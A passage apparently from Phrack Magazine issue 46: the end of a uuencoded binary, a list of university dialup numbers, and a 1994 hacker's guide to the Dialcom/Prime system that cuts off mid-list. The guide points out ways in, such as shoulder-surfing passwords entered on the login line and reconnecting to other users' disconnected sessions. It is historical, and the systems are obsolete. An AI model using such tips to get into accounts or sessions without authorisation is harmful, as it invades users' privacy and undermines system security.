M?WE'(7=>.TJ@Q]$$.">=Y5_N#/+BPZH#Q(WX/3,`;&O+ZQ1JGP'MB,PBY/HBh MY/S^"-F(C6ENQ('1_1LO:E#(IWKB(L(UX2)^^(^UX>T&#JC['(;M[O#_-T'5h M%Q``+^[X3R-^H`'V*SJP#C1W@QD)B_VU@J#-Y0ME?^5CS'^R`HZ=`GX^)^]`h M#^=5"+NEZOO;2HFA@B4!W'"V"[P??Y)PJ?#I!&&@XG8%$CRI>K'PAA;">609O#\VP!Z^C87NIUZ7$[h M_/MF%4;2@/V^^8'1Y33$Q+][@,9TAPG:N;6&WO(36.#:9(&1YEORS(4CV$IVh M6/425%-G&KD0C:WCM*EC1^8L43_@F,7A://HJ5><#/`0F@PBAB;#+9D+4_YIh MWB&Z$90!&QF497@$3D8N<+*\Q,;\1JL*BB=0O`&ALS+^=4M8-(!@=-.I(*76h M==N2:MJV94$R32M6;EBY>4&V!#GT+=R\14L7),JQ*4'&S(DS)TN03=..h ME?MV[ELSTW4O%RZ$?A;Y#>]6@--PP8`#L*CO'/K5:%*F1;\F=6KTR3E@4P08h M.'#@@`&V@04WE0^)AH8B9[60T%AN5H7``Rh M*6#*).$!SR2!,0.^(!A`@,J^"#B#8``+*DDD2K=UV;)-88ROT+Q'N`,+PICFh M:2`8P\;1$@@6>)#A)BR*QW`?TKK#>=SMQG0)$Z28VQUI6KIMP[H%F91N6#:6h M6F$^A94NJA-DR;D@>29U"[>.^6;3LBWK@SG2F$XS,Yh MRWF?+AK$/LT[2CG_W;X1VZ0^+1GS[Y3#OD$:80ZN''8,V.8-?@Y8TV&LLD?#h M6H,L4V3?VK7GGNK0ZOZ29(9]+DL%Q:S9^^YH!\'Z+L,R#P1E*W80^Q*Qh M)I1CC#9%NE53Q8D[`*/-CX/XFE8I=DNT)h M$V])O"E#&#M,F"G:2;EE%LYRW:(4\\S[#)N9=Y-G@UO+DA&"S=FB=8XT1.O/h MTXFO?=2GC^2EVF!ZF`T5=%YL]K%KLKC=LG+-LGU[)WJ``[;YC&T).OW/8`^2h M;%J[::9HL&_R5@`&SG.`BQBU#/%U;K6CAW-TXIM](R=WTQX3=N,I]=?N_`$0h MFVTL1U:=.X>5$QM+J/\'4$L!`@H!"@````8`4K>9:;N-E4+('0``_2T```L`h M`````````````````````$U38W)Y<'0N97AE4$L%!@`````!``$`.0```/$=h $``````#!h `h end -=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=- ==Phrack Magazine== Volume Five, Issue Forty-Six, File 13 of 28 **************************************************************************** The Phrack University Dialup List [We've been compiling all these for months now, and still have hundreds more to add. If you know dialups for any other .EDU sites or Universities elsewhere in the world that are on the Internet, please mail them to us at phrack@well.com. Please, Universities ONLY...this is a list to assist students. :) ] ----------------------------------------------------------------------------- 201-529-6731 RAMAPO.EDU 201-596-3500 NJIT.EDU 201-648-1010 RUTGERS.EDU 203-432-9642 YALE.EDU 205-895-6792 UAH.EDU 206-296-6250 SEATTLEU.EDU 206-552-5996 WASHINGTON.EDU 685-7724 7796 209-278-7366 CSUFRESNO.EDU 209-632-7522 CALSTATE.EDU 209-474-5784 CSUSTAN.EDU 523-2173 667-3130 723-2810 210-381-3681 PANAM.EDU 3590 210-982-0289 UTB.EDU 212-206-1571 NEWSCHOOL.EDU 229-5326 212-854-1812 COLUMBIA.EDU 1824 1896 3726 9924 212-995-3600 NYU.EDU 4343 213-225-6028 CALSTATELA.EDU 213-259-2732 OXY.EDU 213-740-9500 USC.EDU 214-368-1721 SMU.EDU 3131 215-359-5071 DCCC.EDU 215-436-2199 WCUPA.EDU 6935 215-489-0351 URSINIUS.EDU 215-572-5784 BEAVER.EDU 215-641-6436 MC3.EDU 215-204-1010 TEMPLE.EDU 9630 9638 215-889-1336 PSU.EDU 215-895-1600 DREXEL.EDU 5896 215-896-1318 HAVERFORD.EDU 1824 215-898-8670 UPENN.EDU 6184 0834 3157 216-368-8888 CWRU.EDU 217-333-4000 UIUC.EDU 3700 244-5109 4976 255-9000 219-237-4116 INDIANA.EDU 4117 4186 4187 4190 4413 4415 262-1082 481-6905 980-6553 6556 6866 6869 219-989-2900 PURDUE.EDU 301-403-4444 UMD.EDU 303-270-4865 COLORADO.EDU 447-1564 492-0346 1900 1949 1953 1968 1998 938-1283 303-458-3588 REGIS.EDU 303-556-4982 MSCD.EDU 623-0763 0774 892-1014 303-698-0515 DU.EDU 871-3319 3324 4770 309-438-8070 ILSTU.EDU 8200 309-677-3250 BRADLEY.EDU 310-769-1892 CALSTATE.EDU 310-985-9540 CSULB.EDU 312-362-1061 DEPAUL.EDU 312-413-3200 UIC.EDU 3212 312-753-0975 UCHICAGO.EDU 313-764-4800 MERIT.EDU 258-6811 313-487-4451 EMICH.EDU 314-883-7000 MISSOURI.EDU 315-443-1320 SYR.EDU 1330 3396 1045 317-285-1000 BSU.EDU 1003 1005 1019 1048 1064 1068 1070 1076 1077 1087 1088 1089 1090 1099 1107 1108 317-494-6106 PURDUE.EDU 496-2000 317-455-2426 INDIANA.EDU 973-8265 318-261-9662 USL.EDU 9674 319-335-6200 UIOWA.EDU 402-280-2119 CREIGHTON.EDU 404-727-8644 EMORY.EDU 404-894-2191 GATECH.EDU 2193 2195 407-722-2202 FIT.EDU 407-823-2020 UCF.EDU 407-835-4488 PBAC.EDU 408-425-8930 UCSC.EDU 408-554-5050 SCU.EDU 9652 408-924-1054 CALSTATE.EDU 409-294-1965 SHSU.EDU 409-568-6028 SFASU.EDU 410-329-3281 UMD.EDU 744-8000 333-7447 410-516-4620 JHU.EDU 5350 410-788-7854 UMBC.EDU 410-837-5750 UBALT.EDU 412-396-5101 DUQ.EDU 412-578-9896 CMU.EDU 268-6901 856-0815 412-621-5954 PITT.EDU 2582 3655 3720 8072 836-7123 9997 412-938-4063 CUP.EDU 413-538-2345 MTHOLYOKE.EDU 413-545-0755 UMASS.EDU 3161 3050 3056 5345 3100 3780 413-585-3769 SMITH.EDU 413-597-3107 WILLIAMS.EDU 415-333-1077 CALSTATE.EDU 415-338-1200 SFSU.EDU 2400 415-380-0000 STANFORD.EDU 416-492-0239 TORONTO.EDU 501-575-3150 UARK.EDU 3506 7254 7266 8690 502-588-7027 LOUISVILLE.EDU 6020 8999 503-245-5511 PCC.EDU 503-346-5975 UOREGON.EDU 2150 3536 503-370-2500 WILLAMETTE.EDU 503-725-3100 PDX.EDU 3144 3201 5220 5401 503-737-1513 ORST.EDU 1517 1560 1569 503-777-7757 REED.EDU 504-286-7300 UNO.EDU 504-334-1024 LSU.EDU 505-277-9990 UNM.EDU 5950 6390 505-646-4942 NMSU.EDU 508-798-0166 WPI.EDU 509-375-9326 WSU.EDU 510-643-9600 BERKELEY.EDU 510-727-1841 CSUHAYWARD.EDU 512-245-2631 SWT.EDU 512-471-9420 UTEXAS.EDU 475-9996 513-327-6188 WITTENBERG.EDU 513-556-7000 UC.EDU 517-336-3200 MSU.EDU 351-9640 518-276-2856 RPI.EDU 8898 8400 2857 2858 8990 518-435-4110 ALBANY.EDU 4160 519-725-5100 WATERLOO.EDU 601-325-4060 MSSTATE.EDU 2830 8348 602-435-3444 MARICOPA.EDU 602-965-7860 ASU.EDU 603-643-6300 DARTMOUTH.EDU 604-753-3245 MALPITA.EDU 606-622-2340 EKU.EDU 606-257-1232 UKY.EDU 1353 1361 1474 2836 4244 5627 258-1996 2400 1200 323-1996 2400 2700 609-258-2630 PRINCETON.EDU 609-896-3959 RIDER.EDU 610-683-3692 KUTZTOWN.EDU 612-626-1920 UMN.EDU 2460 9600 614-292-3103 OHIO-STATE.EDU 3112 3124 3196 614-593-9124 OHIOU.EDU 615-322-3551 VANDERBILT.EDU 3556 343-0446 1524 615-372-3900 TNTECH.EDU 615-974-3201 UTK.EDU 4282 6711 6741 6811 8131 616-394-7120 HOPE.EDU 617-258-7111 MIT.EDU 257-6222 617-287-4000 UMB.EDU 265-8503 617-353-3500 BU.EDU 4596 9118 9415 9600 617-373-8660 NEU.EDU 617-437-8668 NORTHEASTERN.EDU 617-495-7111 HARVARD.EDU 617-727-5920 MASS.EDU 619-292-7514 UCSD.EDU 436-7148 452-4390 4398 8280 8238 9367 453-9366 480-0651 534-5890 6900 6908 558-7047 7080 9097 619-594-7700 SDSU.EDU 619-752-7964 CSUSM.EDU 702-895-3955 UNLV.EDU 703-831-5393 RUNET.EDU 703-993-3536 GMU.EDU 707-664-8093 CALSTATE.EDU 822-6205 707-826-4621 HUMBOLDT.EDU 708-467-1500 NWU.EDU 713-749-7700 UH.EDU 7741 7751 714-364-9496 CALSTATE.EDU 714-773-3111 FULLERTON.EDU 526-0334 714-856-8960 UCI.EDU 716-273-2400 ROCHESTER.EDU 716-645-6128 BUFFALO.EDU 719-594-9850 UCCS.EDU 535-0044 801-581-5650 UTAH.EDU 8105 585-4357 5550 803-656-1700 CLEMSON.EDU 804-594-7563 CNU.EDU 804-924-0577 VIRGINIA.EDU 982-5084 805-549-9721 CALSTATE.EDU 643-6386 805-664-0551 CSUBAK.EDU 805-756-7025 CALPOLY.EDU 805-893-8400 UCSB.EDU 806-742-1824 TTU.EDU 808-946-0722 HAWAII.EDU 956-2294 810-939-3370 UMICH.EDU 812-855-4211 INDIANA.EDU 4212 9656 9681 944-8725 9820 945-6114 814-269-7950 PITT.EDU 7970 362-7597 7558 827-4486 814-863-0459 PSU.EDU 4820 9600 865-2424 816-235-1491 UMKC.EDU 1492 1493 6020 818-701-0478 CSUN.EDU 901-678-2834 MEMST.EDU 904-392-5533 UFL.EDU 904-646-2772 UNF.EDU 2735 906-487-1530 MTU.EDU 907-474-0772 ALASKA.EDU 789-1314 908-571-3555 MONMOUTH.EDU 908-932-4333 RUTGERS.EDU 909-595-3779 CSUPOMONA.EDU 909-595-5993 CALPOLY.EDU 598-7104 909-621-8233 HMC.EDU 909-621-8455 POMONA.EDU 8332 909-621-8361 CLAREMONT.EDU 8313 8108 8509 909-880-8833 CSUSB.EDU 913-864-5310 UKANS.EDU 897-8650 916-456-1441 CSUS.EDU 737-0955 916-752-7900 UCDAVIS.EDU 7920 7950 916-894-3033 CSUCHICO.EDU 919-681-4900 DUKE.EDU 919-759-5814 WFU.EDU 919-962-9911 UNC.EDU ----------------------------------------------------------------------------- Canada 204-275-6100 umanitoba.ca 6132 6150 306-586-5550 University of Regina 306-933-9400 University of Saskatchewan 403-492-0024 University of Alberta 0096 3214 416-978-3959 University of Toronto 8171 418-545-6010 Universite du Quebec a Chicoutimi 418-656-7700 laval u 3131 5523 506-453-4551 University of New Brunswick 4560 4609 452-6393 514-285-6401 uquebec.ca 514-340-4449 polymtl.ca 4450 4951 343-2411 514-398-8111 McGill University 8211 8711 514-733-2394 Universite de Montreal 1271 0832 514-343-2411 7835 514-848-8800 concordia.ca 7494 8828 4585 8834 7370 519-661-3511 University of Western Ontario 3512 3513 519-252-1101 Windsor University 519-725-5100 University of Waterloo 1392 604-291-4700 simon fraser u 4721 5947 604-721-2839 univ of victoria 6148 604-822-9600 University of British Columbia 613-788-3900 Carleton University 564-5600 613-548-8258 Queen's University 545-0383 613-564-3225 University of Ottawa 5926 613-230-1439 York University 705-741-3350 Trent University 3351 4637 709-737-8302 Memorial Univ. of Newfoundland 807-346-7770 Lakehead University 819-569-9041 usherb.ca 821-8025 819-822-9723 bishop u 819-595-2028 Universite du Quebec a Hull 902-542-1585 acadiau.edu 902-425-0800 tuns.ca 420-7945 902-429-8270 Saint Mary's University 902-494-2500 Dalhousie University 8000 902-566-0354 University of Prince Edward Island 905-570-1889 McMaster University 1046 ----------------------------------------------------------------------------- The Rest of the World 31-40-435049 tue.nl 455215 430032 34-1-582-1941 Facultad de Odontologia 3-333-9954 Barcelona Polytechnic 8991 Univ of Barcelona 581-2091 691-5881 Polytechnic University 34-7-656-6553 Univ of Zaragosa 0108 6654 44-3-34-2755 st-andrews.ac.uk 44-71-413-0790 birkbeck college 44-524-843878 lancashire 44-785-214479 staffs.ac.uk 49-621-292-1020 uni-mannheim.de 121-0251 49-631-205-2150 uni-kl.de 3554 3629 3630 49-8421-5665 ku-eichstett.de 49-8452-70035 tu-muenchen.de 61-8-223-2657 Univ of Adelaide 61-9-351-9544 Curtin U 61-9-381-1630 uwa.edu.au 2200 3054 82-2-962 kaist.ac.kr 886-2-363-9529 NAT TECH U, TAIWAN ==Phrack Magazine== Volume Five, Issue Forty-Six, File 14 of 28 **************************************************************************** A L I T T L E A B O U T D I A L C O M *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* by Herd Beast (hbeast@phantom.com) Introduction ~~~~~~~~~~~ Dialcom is an interesting system for hackers for two reasons: First, it is used by business people, reporters and many other world wide, and it offers a variety of information services, from a bulletin board to stock market updates and news services. Second, Dialcom runs on Prime machines, so using Dialcom is a good way to learn Prime. True, it's not the best, as access is generally restricted, but it's better than, say, learning VMS from Information America. In these days, where everyone seems to be so centered about the Internet and the latest Unix holes, it's important to remember that the information super-highway is not quite here, and many interesting things are out there and not on the Internet. Phrack has always been a good place to find out more about these things and places, and I wrote this article after reading the Dialog articles in Phrack. Well, gentle reader, I guess that my meaning-of-life crap quota is full, so let's move on. Accessing Dialcom and Logging In ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Dialcom is accessible world-wide. It offers connection to Tymnet, Sprintnet, and other networks as well as dialin modems. Since I am not writing to Washington people only, I will specify only the easiest methods -- Tymnet and Sprintnet -- and some of the more interesting access methods. Dialcom is basically a Primecom network. Each user has an account on one or more of the systems connected to that network. To access Dialcom, the user needs to access the machine his account is on. First, he logs into a public data network and follows the steps required to connect to a remote note. On Tymnet, this means getting to the "please log in:" prompt, and on Sprintnet it's the famous '@' prompt. For Tymnet, you must enter at the prompt: DIALCOM; (eg, DIALCOM;57). The same goes for TYMUSA connection from outside the USA. For Sprintnet or other PADs, you must enter the correct NUA: System # Sprintnet NUA Tymnet NUA ======== ============= ============= XX 3110 301003XX 3106 004551XX (32, 34, 41 - 46, 50, 52, 57, 61, 63, 64) It should be noted that Dialcom keeps its own X.25 network, Dialnet, and the NUAs on it are those of the systems (connect to address "57" for system 57). Dialcom has other access methods, meant to be used from outside the USA, but sometimes available from within as well. One is a COMCO card, which is inserted into a reader connected to the computer and the modem through a serial link. The user then calls a special dial-up number, and can connect to Dialcom (or any other NUA). The card contains a number of "tax units" which are deducted as the connection goes through, until they are exhausted and the card is useless. The user calls the dial-up and types in ".". The amount of tax units on the card will then appear on the screen, and the user can connect to a host. COMCO dial-ups: Location Number ======================= ============== Australia +61-02-2813511 Belgium +32-02-5141710 France +33-1-40264075 West Germany +49-069-290255 Hong Kong +852-5-8611655 Netherlands +31-020-6624661 Switzerland +41-022-865507 United Kingdom +45-01-4077077 USA (Toll Free) +1-800-777-4445 USA +1-212-747-9051 The other way is through Infonet. I will not turn this into an Infonet guide, save to write the logon sequence needed to access Dialcom. At the '#' prompt, enter 'C'. At the "Center:" prompt, enter "DC". Dialcom NUAs are 31370093060XX, where XX is the system number. Once the connection to a Dialcom system has been established, you will be greeted by the Prime header: Primecom Network 19.4Q.111 System 666 Please Sign On > And the '>' prompt. This is a limited prompt as most commands cannot be issued at it, so you need to login. Dialcom user id's are typically 3 alphabetic characters followed by several digits. The password may contain any character except for ",;/*" or spaces, and my experience shows that they tend to be of intermediate complexity (most will not be found in a dictionary, but could be cracked). Password security may become useless at this point, because the Dialcom Prime systems allow ID to take both user id and password as arguments (which some other Primes do not) and in fact, Dialcom tutorials tell users to log on like this -- >ID HBT007 IMEL8 -- which makes ``shoulder surfing'' easier. One you log on, you will see: Dialcom Computer Services 19.4Q.111(666) On At 14:44 07/32/94 EDT Last On At 4:09 06/44/94 EDT > And again, the '>' prompt. >off Off At 14:45 07/32/94 EDT Time used: 00h 00m connect, 00m 01s CPU, 00m 00s I/O. Security at Dialcom ~~~~~~~~~~~~~~~~~~ As mentioned, while passwords are relatively secure, the manner in which they are entered is usually not. As for the accounts themselves, it's important to understand the general way accounts exist on Dialcom. Dialcom users are usually part of a business that has an ``account group'' on Dialcom. Each user gets an account from that group (HBT027, HBT054). Each group also has a group administrator, who controls what each account can access. The administrator determines which programs (provided by Dialcom) each user can access. A foreign correspondent for a magazine might have access to the news services while other users might not. The administrator also determines how much the user can interface with the Prime OS itself. Each user can run a few basic commands (list files, delete, sign off) but above that, it's up to the administrator. The administrator may opt to remove a user from the controlling menuing system -- in which case, the user has no restrictions forced upon him. Group administrators, however, handle only their groups, and not the Dialcom system. They need, for example, to notify Dialcom staff if they want an account removed from the system. Another (different yet combined) part of the account/group security are accounts' ``security levels'' (seclevs). Seclevs range from 3 to 7, and determine the access an account has to various places. Seclev 4 users, for example, are not restricted to seeing only users of their group on the system, and can delete accounts from the menuing system. User accounts own their directories and files within (but high seclevs can read other users' files). Each account's security is left in some extent to its owner, in that the user sets his own password. When setting a password, a user can set a secondary password. Any user wishing to access that user's directory will need that password. Furthermore, the user can allow other users to attach as owners to his directory if they know his password (come to think of it, couldn't they just login as him?). This is all controlled by the PASSWD program (see ``Common Commands'', below). Dialcom also allows for login attempt security using the NET_LOCK program. NET_LOCK blocks login attempts from addresses that have registered too many login failures over a period of time (the default being blocking for 10 minutes of addresses that have registered more than 10 failed login within 5 minutes). NET_LOCK -DISPLAY is accessible to users of Seclev 5 and shows addresses currently blocked and general information. Other options are accessible to Seclev 7 and are: -ON, -OFF, -ATTEMPTS (number of attempts so that NET_LOCK will block an address), -LOCK_PERIOD (the period in which these attempts must occur), -LOCK_TIME (time to block), -WINDOW (a time window in which the lockout feature is disabled). A little unrelated is the network reconnect feature of the Prime computers. When a user gets disconnected from the system because of a network failure, or for any other reason which is not the system's fault, he can log back in and reconnect into the disconnected job. When this happens, the user sees, upon logging on: You Have a Disconnected Job: HBT007 d09 1 109 NT NETLINK 989898989 6 3 Do You Want to Reconnect? Which means user's HBT007 job #9 (a NETLINK command) is waiting for a reconnection. At this point, the user can continue, leaving the job to hang until the system signs it off when a certain amount of time expires; sign the job off himself; or reconnect to that job. (Try "HELP" at the prompt.) This wouldn't be important, but experience shows that many disconnections occur when someone logs into Dialcom over a network, and then uses NETLINK (or another program) to connect to another site over a network, and somewhere, some time, he issues a control sequence (let's say to tell NETLINK to do something) that gets processed by the first network, which logs him off. So there is potential to log into the middle of people's sessions (yeah, like detached ttys). Common Commands ~~~~~~~~~~~~~~ Common commands are in reality the basic Prime commands that every account has access to. Here they are, in alphabetical order. `CLEAR' Clear the screen. `DATE' Shows the date at which a command was entered. Output: >DATE Proceed to next command >BAH Friday, June 38, 1994 10:01:00 AM EDT `DEL' Deletes a file. `DELP' Deletes several files based on wildcards. Can verify deletion of every file, and delete only file modified before, after, or between certain dates. `ED' Is the default and simplest file editor on Dialcom (some of its brothers are JED and FED). Once invoked, ED enters INPUT mode, in which the user just types text. To enter EDIT mode, where you can issue commands, you need to press on a blank line (the same thing will get you from EDIT mode back to INPUT mode). The EDIT mode uses a pointer to a line. All commands are carried on the line that the pointer points to. "T" will bring the pointer to the top of the text, "B" to the bottom, "N" to the next line down, "U" to the next line up, and "L " to the line containing . ED commands include: P: PRINT the pointer line. P will print of lines. C: Change words. The format is "C/old word/new word". A: Appends words. The format is "A ". R: Retype pointer line. The format is "R ". SP: Check the spelling of the text, and then point to the top of the text. SAVE: Will save the text and exit ED. Q: Will quit/abort editing and exit ED. `F' List all file info. Output: DIALCOM.TXT 001 13/30/94 13:50 ASC D W R Which means file name "DIALCOM.TXT", size of 1 file blocks, lat modified on 13/30/94 at 13:50, is an ASC type file, and the account has the permissions to D(elete), W(rite), and R(ead) it. `HELP' (`?') Displays a nicely formatted menu of available commands. `INFO' System info. INFO displays an information file, for example, INFO NETLINK. "INFO ?" lists info files. "INFO BRIEF" lists info files grouped by application "INFO INFO" lists info files with their descriptions. `L' List all file names. Output: HBT007 (Owner) DIALCOM.TXT `LS' Display information about available segments and the account's access to them. Output: 2 Private static segments. segment access -------------- 4000 RWX 4001 RWX 11 Private dynamic segments. segment access -------------- 4365 RX 4366 RX 4367 RWX 4370 RWX 4371 RX 4372 RWX 4373 RX 4374 RWX 4375 RX 4376 RX 4377 RWX `NAME' Changes UFD name. Output: >NAME Old Name: John Gacy UFD Name: Herd Beast All done >WHO Herd Beast HBT007 `NETWORK' Accesses a database that contains dial-up number for Sprintnet, Tymnet, Datapac and Dialcom's Dialnet by State/City. `OFF' Sign off the system. `ONLINE' Who's online? The amount of data displayed depends on the account's seclev. Seclevs below 4 are restricted to seeing only users of their group. Output: HBT007 PRK017 MJR `PAD' Allows you to send commands to an X.29 PAD, these commands being the SET/SET?/PAR? commands and their parameter/value pairs. `PASSWD' Change your password. PASSWD has two forms: a short one, which just changes the user's password, and a long form, invoked by PASSWD -LONG, which allows the user to set a second password for other users accessing his directory, and also to determine if they can have owner access to the directory. `PROTECT' Protects a file (removes permissions from it). "PROTECT DIALCOM.TXT" will remove all three (D, W, R) attributes from it. This will result in: >DEL DIALCOM.TXT Insufficient access rights. DIALCOM.TXT (DEL:10) But -- >DELETE DIALCOM.TXT "DIALCOM.TXT" protected, ok to force delete? y `SECLEV' Your security level. Output: Seclev=5 `SIZE' Size information about a file. Output: 1 Block, 404 Words `STORAGE' Shows storage information. `SY' Show users on system. (Same restrictions as for ONLINE apply.) Will show user name, time on, idle time, devices used, current jobs and state, etc. Output: 41 Users on sys 666 Names use idle mem State command object devs HBT007 *11 0 155 R1 SY 6 3 from Tymnet via X.25 `SYS' Displays account information and system number. Output: HBT007 on system 666. `TERM' Used to tell the Dialcom computer what terminal the user is using. A list of supported terminals is generated by "TERM TERMINALS". TERM options are: TYPE (TYPE VT100) WIDTH (Terminal width, if different than default) TOP (Start listings at top of screen) PAUSE (Pause listings when screen is full) -ERASE, -KILL (Sets the erase or kill character) -BREAK (Enables or disables BREAKs) -HALF or -FULL (Half duplex of full duplex) -DISPLAY (Output current terminal information) `WHO' Displays account information. Output: HBT007 Which means user HBT007 on system 666 on device 6. Communicating on Dialcom ~~~~~~~~~~~~~~~~~~~~~~~ Users who want to communicate on Dialcom have two choices, basically. These are the Dialcom bulletin board and electronic mail. The Dialcom bulletin board has two versions. The first consists of several message bases (called ``categories'') which are shared between some Dialcom systems (and mostly used by bored employees, it seems); there are also private bulletin boards, which are not shared between the systems. They belong to account groups, and only users in an account group can access that group's bulletin board system. These version of the Dialcom board are often empty (they have no categories defined and hence are unusable). This is accessed by the command POST (PRPOST for the private board). Once POST is activated, it will display a prompt: Send, Read or Purge: If the answer is READ, POST will ask for a category (a list of categories will be displayed if you type HELP at that prompt). Once a category has been joined, you will be able to read through the messages there: Subject: ? From: HBT007 Posted: Sat 32-July-94 16:47 Sys 666 quit /q /quit Continue to Next Item? Answering SEND at the first prompt will allow you to send a message in a category. Answering PURGE will allow you to delete messages post by your account. When you enter PURGE and the category to purge message from, the system will show you any posts that you are allowed to purge, followed by a "Disposition:" prompt. Enter DELETE to delete the message. The second way to communicate is the Dialcom MAIL system. MAIL allows sending and receiving messages, it allows for mailing lists, filing mail into categories, holding mail to read later and so on. MAIL is invoked by entering, uh... oh, yes, MAIL. It works along similar lines to those of POST, and will display the following prompt: Send, Read or Scan: SEND: Allows you to send a message. It will prompt with "To:", "Subject:" and "Text:" (where you enter the actual message, followed by ".SEND" on a blank line to end). After a message is sent, the "To:" prompt will appear again -- use "QUIT" to leave it. A word about the "To:" prompt. There are two configuration files which make its use easier. First the MAIL.REF file, which is really a mailing list file. It contains entries in the format of -- DOODZ DVR014 ABC0013 XYZ053 -- and at the "To:" prompt, you can just enter "DOODZ" and the message will be sent to all three accounts. When you enter a name, MAIL searches through your MAIL.REF, and then through the account administrator's, and only then parses it as an account name. Second is the mail directory, which contains the names and account IDs of many users the account is in contact with. To display it, type "DIS DIR" at the first prompt. You'll get something like this: HERD-BEAST 6666:HBT007 WE'RE BAD AND WE'RE KRAD Which means you can type "HERD-BEAST" at the prompt, and not just HBT007. Also, there are special options for the "To:" prompt, most notable are: CC to send a carbon copy; EX to send the message with ``express priority''; DAR to request that if the message is sent to a user on another Dialcom system, POSTMASTER will send you a message verifying that your message has been sent; and NOSHOW, to keep the receiver from seeing everybody else on the "To:" list. For example (all these people are in the mail directory), To: DUNKIN D.DREW CC FOLEY NOSHOW EX You enter the message about to be sent at the "Text:" prompt. That mode accepts several commands (like .SEND), all of which begin with a dot. Any command available at the "To:" prompt is available here. For example, you can add or remove names from to "To:" field using ".TO " or ".TO -", and add a CC using ".CC ". You also have a display command, ".DIS". ".DIS" alone shows the text entered so far; ".DIS TO" shows the "To:" field; ".DIS HE" shows the entire header; etc. Finally, you have editing option. ".ED" will load editing mode, so you can change the text you entered. ".LOAD " will load into the text of the message. ".SP" will check the spelling of text in the message, and there are other commands. READ: Allows you to read mail in your mailbox. Once you enter READ, MAIL will display the header of the first message in your mailbox (or "No mail at this time") followed by a "--More--" prompt. To read the message, press ; otherwise, enter NO. After you are done reading a message, you will be prompted with the "Disposition:" prompt, where you must determine what to do with the message. There you can enter several commands: AGAIN to read the message again; AG HE to read the header again; AP REPLY to reply to the message and append the original message to the reply; AP FO to forward the message to someone and add your comments to it; REPLY to reply to the sender of the message; REPLY ALL to reply to everybody on the "To:" field; FILE to file the message; SA to save the message into a text file; NEXT to read the next message in your mailbox; and D to delete the message. SCAN: Allows you see a summary of the messages in the mailbox. Both READ and SCAN have options that allow you to filter the messages you want to read: FR to get only messages from ; TO to get only messages sent to ; 'string' to get only messages containing ``string'' in the "Subject:" field; "string" to get only messages containing ``string'' in the message itself; FILE CATEGORY to get only messages filed into ``CATEGORY''; and DA Month/Day/Year to get only messages in that date (adding a '-' before or after the date will get you everything before or after that date, and it's also possible to specify two dates separated by a '-' to get everything between those dates. For example, to get all of Al Gore's messages about Clipper before August 13th: READ FILE CLIPPER FR GOR 'Great stuff' DA -8/13/94 There is also a QS (QuickScan) command that behaves the same as SCAN, only SCAN shows the entire header, and QS just shows the "From:" field. However, there is more to do here than just send, read or scan. Some of it was mentioned when explaining these commands. Both sent and received messages can be saved into a plain text file or into a special mailbox file, called MAIL.FILE. Messages filed into the MAIL.FILE can be grouped into categories in that file. SAVING MESSAGES: Messages are saved by entering "SA filename" at a prompt. For sent message, it's the "Text:" prompt, while entering the message, and the command is ".SA", not "SA". For received message, it's either the "--More--" or the "Disposition:" prompt. FILING MESSAGES: Messages are filed in two cases. First, the user can file any message into any directory, and second, the system files read messages that lay in the mailbox for over 30 days. Received messages are filed by entering "FILE" at the "Disposition:" prompt. This files the message into a miscellaneous category called BOX. If an optional is added after "FILE", the message will be filed into that category. If doesn't exist, MAIL can create it for you. After a message has been filed, it's not removed from the mailbox -- that's up to the user to do. Sent messages behaved the same way, but the command is ".FILE" from the "Text:" prompt. To display categories of filed mail, enter DIS FILES at a prompt. To read or scan messages in filed, just add "FILE after the command (READ, SCAN, etc). To delete a category, enter D FILE . To delete a single message in a category, just use D as you would on any other message, after you read it from the MAIL.FILE. Connecting via Dialcom ~~~~~~~~~~~~~~~~~~~~~ Dialcom allows its customers to access other systems through it. There are some services offered specifically through Dialcom, such as the BRS/MENUS service, which is an electronic library with databases about many subjects, Telebase's Cyclopean Gateway Service, which offers access to many online database services (like Newsnet, Dialog and even BRS) and more. These services have a direct connection to Dialcom and software that maps Dialcom user ids to their own ids (it's not usually possible for someone to access one of these services without first connecting to Dialcom). Another method is general connection to X.25 addresses. Since Dialcom is connected to X.25, and it allows users to use the Prime NETLINK commands, it's possible to PAD out of Dialcom!!#! NETLINK is invoked by entering NETLINK. NETLINK then displays its own, '@' prompt. The commands available there are QUIT, to quit back to the OS; CONTINUE, to return to an open connection; CALL, to call an address; and D, to disconnect an open connection. CALL takes addresses in several formats. A system name, to connect to a Dialcom system, or an address in the format of DNIC:NUA. For example, @ CALL :666 Circuit #1 666 Connected [...] @ CALL 3110:21300023 Circuit #2 21300023 Connected [...] NETLINK establishes connections in the form of circuits. A circuit can be broken out of into command mode (the '@' prompt), using "@", and another can be opened, or parameters can be changed, etc. NETLINK has other commands, to log connections into a file, or set PAD parameters (SET, PAR), or turn on connection debugging, or change the default '@' prompt, and more. Things to Do on Dialcom ~~~~~~~~~~~~~~~~~~~~~~ Much of what Dialcom offers was not covered until now and will not be covered. That's because most the services could use a file each, and because many account groups have things enabled or disabled just for them. Instead, I will write shortly about two of the more interesting things online, the news service and clipping service, and add pointers to some interesting commands to try out. The news service, accessed with the NEWS command, is a database of newswires from AP, Business Wire, UPI, Reuters and PR Newswire. The user enters the database, and can search for news by keywords. After entering NEWS, you will see a menu of all the news agencies. Once you choose an agency, you will enter its menu, which sometimes contains a copyright warning and terms of usage and also the list of news categories available from that agency (National, North America, Business, Sports, etc). Once you choose the category, you will be asked for the keyword to search for. If a story (or several stories) was found containing your desired keyword, you can read through the stories in the order of time, or the order they appear, or reverse order and so on, and finally mail a story to yourself, or enter new search keywords, or jump to another story, or simply quit. The news clipping service, available with the command NEWSTAB, allows the user to define keyword-based rules for selecting news clippings. The system then checks every newswire that passes through it, and if it matches the rules, mails the newswire to the user. After entering NEWSTAB, you are presented with a menu that allows you to show, add, delete, and alter your rules for choosing news. The rules are made using words or phrases, logical operators, wildcards and minimal punctuation. A rule can be as simple as "HACKING", which will get every newswire with the word "hacking" in it mailed to you, or if you want to be more selective, "NASA HACKING". Logical operators are either AND or OR. For example, "HACKING AND INTERNET". Wildcards are either '*' or '?' (both function as the same). They simple replace any number of letters. Punctuation is permitted for initials, abbreviations, apostrophes or hyphens, but not for question marks and similar. All of this is explained in the NEWSTAB service itself. For the file hungry, Dialcom offers several file transfer programs, including KERMIT and Dialcom's FT, which implements most popular protocols, like Zmodem, Xmodem, etc. A small number of other fun things to try: NET-TALK 